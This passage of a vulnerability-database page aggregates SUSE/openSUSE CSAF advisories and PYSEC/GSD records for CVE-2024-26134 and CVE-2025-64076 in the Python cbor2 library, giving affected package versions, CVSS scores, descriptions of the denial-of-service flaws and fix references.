        "text": "This update for python-cbor2 fixes the following issues:\n\n- CVE-2025-64076: Fixed bug in decode_definite_long_string() that causes incorrect chunk length calculation (bsc#1253746).\n\n\nAlready fixed in release 5.6.3:\n\n- CVE-2024-26134: Fixed potential crash when hashing a CBORTag (bsc#1220096).\n",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Leap-16.0-91",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025-20133-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1220096",
        "url": "https://bugzilla.suse.com/1220096"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253746",
        "url": "https://bugzilla.suse.com/1253746"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2024-26134 page",
        "url": "https://www.suse.com/security/cve/CVE-2024-26134/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64076 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64076/"
      }
    ],
    "title": "Security update for python-cbor2",
    "tracking": {
      "current_release_date": "2025-12-02T13:51:41Z",
      "generator": {
        "date": "2025-12-02T13:51:41Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025-20133-1",
      "initial_release_date": "2025-12-02T13:51:41Z",
      "revision_history": [
        {
          "date": "2025-12-02T13:51:41Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-160000.3.1.aarch64",
                "product": {
                  "name": "python313-cbor2-5.6.5-160000.3.1.aarch64",
                  "product_id": "python313-cbor2-5.6.5-160000.3.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-160000.3.1.ppc64le",
                "product": {
                  "name": "python313-cbor2-5.6.5-160000.3.1.ppc64le",
                  "product_id": "python313-cbor2-5.6.5-160000.3.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-160000.3.1.s390x",
                "product": {
                  "name": "python313-cbor2-5.6.5-160000.3.1.s390x",
                  "product_id": "python313-cbor2-5.6.5-160000.3.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-160000.3.1.x86_64",
                "product": {
                  "name": "python313-cbor2-5.6.5-160000.3.1.x86_64",
                  "product_id": "python313-cbor2-5.6.5-160000.3.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Leap 16.0",
                "product": {
                  "name": "openSUSE Leap 16.0",
                  "product_id": "openSUSE Leap 16.0"
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-160000.3.1.aarch64 as component of openSUSE Leap 16.0",
          "product_id": "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64"
        },
        "product_reference": "python313-cbor2-5.6.5-160000.3.1.aarch64",
        "relates_to_product_reference": "openSUSE Leap 16.0"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-160000.3.1.ppc64le as component of openSUSE Leap 16.0",
          "product_id": "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le"
        },
        "product_reference": "python313-cbor2-5.6.5-160000.3.1.ppc64le",
        "relates_to_product_reference": "openSUSE Leap 16.0"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-160000.3.1.s390x as component of openSUSE Leap 16.0",
          "product_id": "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x"
        },
        "product_reference": "python313-cbor2-5.6.5-160000.3.1.s390x",
        "relates_to_product_reference": "openSUSE Leap 16.0"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-160000.3.1.x86_64 as component of openSUSE Leap 16.0",
          "product_id": "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
        },
        "product_reference": "python313-cbor2-5.6.5-160000.3.1.x86_64",
        "relates_to_product_reference": "openSUSE Leap 16.0"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-26134",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2024-26134"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64",
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le",
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x",
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2024-26134",
          "url": "https://www.suse.com/security/cve/CVE-2024-26134"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1220096 for CVE-2024-26134",
          "url": "https://bugzilla.suse.com/1220096"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-02T13:51:41Z",
          "details": "important"
        }
      ],
      "title": "CVE-2024-26134"
    },
    {
      "cve": "CVE-2025-64076",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64076"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Multiple vulnerabilities exist in cbor2 through version 5.7.0 in the decode_definite_long_string() function of the C extension decoder (source/decoder.c): (1) Integer Underflow Leading to Out-of-Bounds Read (CWE-191, CWE-125): An incorrect variable reference and missing state reset in the chunk processing loop causes buffer_length to not be reset to zero after UTF-8 character consumption. This results in subsequent chunk_length calculations producing negative values (e.g., chunk_length = 65536 - buffer_length), which are passed as signed integers to the read() method, potentially triggering unlimited read operations and resource exhaustion. (2) Memory Leak via Missing Reference Count Release (CWE-401): The main processing loop fails to release Python object references (Py_DECREF) for chunk objects allocated in each iteration. For CBOR strings longer than 65536 bytes, this causes cumulative memory leaks proportional to the payload size, enabling memory exhaustion attacks through repeated processing of large CBOR payloads. Both vulnerabilities can be exploited remotely without authentication by sending specially-crafted CBOR data containing definite-length text strings with multi-byte UTF-8 characters positioned at 65536-byte chunk boundaries. Successful exploitation results in denial of service through process crashes (CBORDecodeEOF exceptions) or memory exhaustion. The vulnerabilities affect all applications using cbor2\u0027s C extension to process untrusted CBOR data, including web APIs, IoT data collectors, and message queue processors. Fixed in commit 851473490281f82d82560b2368284ef33cf6e8f9 pushed with released version 5.7.1.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64",
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le",
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x",
          "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64076",
          "url": "https://www.suse.com/security/cve/CVE-2025-64076"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253746 for CVE-2025-64076",
          "url": "https://bugzilla.suse.com/1253746"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.aarch64",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.ppc64le",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.s390x",
            "openSUSE Leap 16.0:python313-cbor2-5.6.5-160000.3.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-02T13:51:41Z",
          "details": "important"
        }
      ],
      "title": "CVE-2025-64076"
    }
  ]
}

OPENSUSE-SU-2025:14733-1

Vulnerability from csaf_opensuse - Published: 2025-02-05 00:00 - Updated: 2025-02-05 00:00

Summary

python311-cbor2-5.6.5-2.1 on GA media

Notes

Title of the patch

python311-cbor2-5.6.5-2.1 on GA media

Description of the patch

These are all security issues fixed in the python311-cbor2-5.6.5-2.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-14733

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-cbor2-5.6.5-2.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-cbor2-5.6.5-2.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-14733",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_14733-1.json"
      },
      {
        "category": "self",
        "summary": "URL for openSUSE-SU-2025:14733-1",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/3J6INDULK4UFE4EESVOPROBMFBKXOAXS/"
      },
      {
        "category": "self",
        "summary": "E-Mail link for openSUSE-SU-2025:14733-1",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/3J6INDULK4UFE4EESVOPROBMFBKXOAXS/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2024-26134 page",
        "url": "https://www.suse.com/security/cve/CVE-2024-26134/"
      }
    ],
    "title": "python311-cbor2-5.6.5-2.1 on GA media",
    "tracking": {
      "current_release_date": "2025-02-05T00:00:00Z",
      "generator": {
        "date": "2025-02-05T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:14733-1",
      "initial_release_date": "2025-02-05T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-02-05T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-cbor2-5.6.5-2.1.aarch64",
                "product": {
                  "name": "python311-cbor2-5.6.5-2.1.aarch64",
                  "product_id": "python311-cbor2-5.6.5-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-cbor2-5.6.5-2.1.aarch64",
                "product": {
                  "name": "python312-cbor2-5.6.5-2.1.aarch64",
                  "product_id": "python312-cbor2-5.6.5-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-2.1.aarch64",
                "product": {
                  "name": "python313-cbor2-5.6.5-2.1.aarch64",
                  "product_id": "python313-cbor2-5.6.5-2.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-cbor2-5.6.5-2.1.ppc64le",
                "product": {
                  "name": "python311-cbor2-5.6.5-2.1.ppc64le",
                  "product_id": "python311-cbor2-5.6.5-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-cbor2-5.6.5-2.1.ppc64le",
                "product": {
                  "name": "python312-cbor2-5.6.5-2.1.ppc64le",
                  "product_id": "python312-cbor2-5.6.5-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-2.1.ppc64le",
                "product": {
                  "name": "python313-cbor2-5.6.5-2.1.ppc64le",
                  "product_id": "python313-cbor2-5.6.5-2.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-cbor2-5.6.5-2.1.s390x",
                "product": {
                  "name": "python311-cbor2-5.6.5-2.1.s390x",
                  "product_id": "python311-cbor2-5.6.5-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-cbor2-5.6.5-2.1.s390x",
                "product": {
                  "name": "python312-cbor2-5.6.5-2.1.s390x",
                  "product_id": "python312-cbor2-5.6.5-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-2.1.s390x",
                "product": {
                  "name": "python313-cbor2-5.6.5-2.1.s390x",
                  "product_id": "python313-cbor2-5.6.5-2.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-cbor2-5.6.5-2.1.x86_64",
                "product": {
                  "name": "python311-cbor2-5.6.5-2.1.x86_64",
                  "product_id": "python311-cbor2-5.6.5-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-cbor2-5.6.5-2.1.x86_64",
                "product": {
                  "name": "python312-cbor2-5.6.5-2.1.x86_64",
                  "product_id": "python312-cbor2-5.6.5-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-cbor2-5.6.5-2.1.x86_64",
                "product": {
                  "name": "python313-cbor2-5.6.5-2.1.x86_64",
                  "product_id": "python313-cbor2-5.6.5-2.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-cbor2-5.6.5-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.aarch64"
        },
        "product_reference": "python311-cbor2-5.6.5-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-cbor2-5.6.5-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.ppc64le"
        },
        "product_reference": "python311-cbor2-5.6.5-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-cbor2-5.6.5-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.s390x"
        },
        "product_reference": "python311-cbor2-5.6.5-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-cbor2-5.6.5-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.x86_64"
        },
        "product_reference": "python311-cbor2-5.6.5-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-cbor2-5.6.5-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.aarch64"
        },
        "product_reference": "python312-cbor2-5.6.5-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-cbor2-5.6.5-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.ppc64le"
        },
        "product_reference": "python312-cbor2-5.6.5-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-cbor2-5.6.5-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.s390x"
        },
        "product_reference": "python312-cbor2-5.6.5-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-cbor2-5.6.5-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.x86_64"
        },
        "product_reference": "python312-cbor2-5.6.5-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.aarch64"
        },
        "product_reference": "python313-cbor2-5.6.5-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.ppc64le"
        },
        "product_reference": "python313-cbor2-5.6.5-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.s390x"
        },
        "product_reference": "python313-cbor2-5.6.5-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-cbor2-5.6.5-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.x86_64"
        },
        "product_reference": "python313-cbor2-5.6.5-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-26134",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2024-26134"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.aarch64",
          "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.ppc64le",
          "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.s390x",
          "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.x86_64",
          "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.aarch64",
          "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.ppc64le",
          "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.s390x",
          "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.x86_64",
          "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.aarch64",
          "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.ppc64le",
          "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.s390x",
          "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2024-26134",
          "url": "https://www.suse.com/security/cve/CVE-2024-26134"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1220096 for CVE-2024-26134",
          "url": "https://bugzilla.suse.com/1220096"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.aarch64",
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.s390x",
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.x86_64",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.aarch64",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.ppc64le",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.s390x",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.x86_64",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.aarch64",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.s390x",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.aarch64",
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.s390x",
            "openSUSE Tumbleweed:python311-cbor2-5.6.5-2.1.x86_64",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.aarch64",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.ppc64le",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.s390x",
            "openSUSE Tumbleweed:python312-cbor2-5.6.5-2.1.x86_64",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.aarch64",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.s390x",
            "openSUSE Tumbleweed:python313-cbor2-5.6.5-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-02-05T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2024-26134"
    }
  ]
}

PYSEC-2024-155

Vulnerability from pysec - Published: 2024-02-19 23:15 - Updated: 2025-01-14 05:22

Details

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Impacted products

Name	purl
cbor2	pkg:pypi/cbor2

Aliases

CVE-2024-26134

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cbor2",
        "purl": "pkg:pypi/cbor2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "387755eacf0be35591a478d3c67fe10618a6d542"
            },
            {
              "fixed": "4de6991ba29bf2290d7b9d83525eda7d021873df"
            },
            {
              "fixed": "387755eacf0be35591a478d3c67fe10618a6d542"
            },
            {
              "fixed": "4de6991ba29bf2290d7b9d83525eda7d021873df"
            }
          ],
          "repo": "https://github.com/agronholm/cbor2",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "5.5.1"
            },
            {
              "fixed": "5.6.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "5.5.1",
        "5.6.0",
        "5.6.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-26134"
  ],
  "details": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.",
  "id": "PYSEC-2024-155",
  "modified": "2025-01-14T05:22:09.226388+00:00",
  "published": "2024-02-19T23:15:07+00:00",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
    },
    {
      "type": "ARTICLE",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
    },
    {
      "type": "ARTICLE",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
    },
    {
      "type": "ARTICLE",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
    },
    {
      "type": "EVIDENCE",
      "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
    },
    {
      "type": "FIX",
      "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
    },
    {
      "type": "FIX",
      "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
    },
    {
      "type": "REPORT",
      "url": "https://github.com/agronholm/cbor2/pull/204"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
    }
  ],
  "related": [
    "GHSA-375g-39jq-vq7m",
    "GHSA-375g-39jq-vq7m"
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GSD-2024-26134

Vulnerability from gsd - Updated: 2024-02-15 06:02

Details

Aliases

CVE-2024-26134

JSON

To clipboard

{
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2024-26134"
      ],
